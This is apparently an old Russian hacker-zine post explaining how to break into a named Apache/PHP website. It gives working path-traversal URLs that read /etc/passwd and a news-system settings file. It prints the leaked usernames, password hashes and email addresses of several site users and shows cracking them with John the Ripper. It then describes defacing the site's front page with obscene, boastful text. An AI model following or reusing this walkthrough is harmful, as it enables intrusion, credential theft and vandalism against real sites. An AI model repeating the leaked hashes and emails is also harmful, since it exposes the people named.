Привет ПерЦЫ!

Пишу статью как трахнуть машину
под Apache/PHP. Казалось бы неприступная
крепость, однако это не так. Рассмотрим сие
действо на примере
http://www.dirgotronix.net.
Ошибка обратного пути в скрипте дает нам
права на чтение любого файла с правами nobody.

http://www.dirgotronix.net/index1.php?p=0|1|&inc=../../../../../../etc/passwd

Но это для примера, на самом деле
получить пароли оттуда невозможно, так как
все пассы в shadow. Что же делать и как нам быть?
На сем серваке стоит система новостей NEWSPRO -
ей то и нагадим. Попостим на парадной
странице?

http://www.dirgotronix.net/NewsPro/newspro.cgi

Спрашивает логин и пассу:)) Фигня,
лезем -
http://www.dirgotronix.net/index1.php?p=0|1|&inc=NewsPro/nsettings.cgi.
Смотрим фрагмент:

userdata``xJason~eEVRZUXE83LV2~jason@dirgo.com~3|
Adam~jcQuuR5qQTMIY~darklord420@hotmail.com~1... 
~1|Ian~3dqS3BOppYJ12~ceol.mhor@scotland.com~1

приводим сию строку к виду:
---------------------------
Adam:jcQuuR5qQTMIY
xJason:eEVRZUXE83LV2
Libby:q9ns.RuPxitpo
Tom:jJB7ZysImv19U
Donald:BcaF5eZqNrklU
Casey:qP93wjt.N.vIw
Ian:3dqS3BOppYJ12
---------------------------

Сохраняем на своей никсовой
машине aka pass.txt. И даем это файло на
растерзание доброму Джону:
./john pass.txt

Курим пару сигарет и пьем
бутылку ПеННОГО пива. Все. Лезем на:
http://www.dirgotronix.net/NewsPro/newspro.cgi

ПОСТИМ ПОД НИКАМИ РАСШИФРОВАННЫХ
ЮЗВЕРЕЙ ЛЮБУЮ МУТЬ НА ПАРАДНОЙ СТРАНИЦЕ aka :

I`m crazY , I`m FOOL, BUT my penis WONDERFUL!!! HA-HA- HA !! LOVE ME SUCKZZZZ!!!
WE ARE THE
GREATEST! RUSSIA - BEST! FUCKZ TO FBI & US HACKERS!

Оставить мнение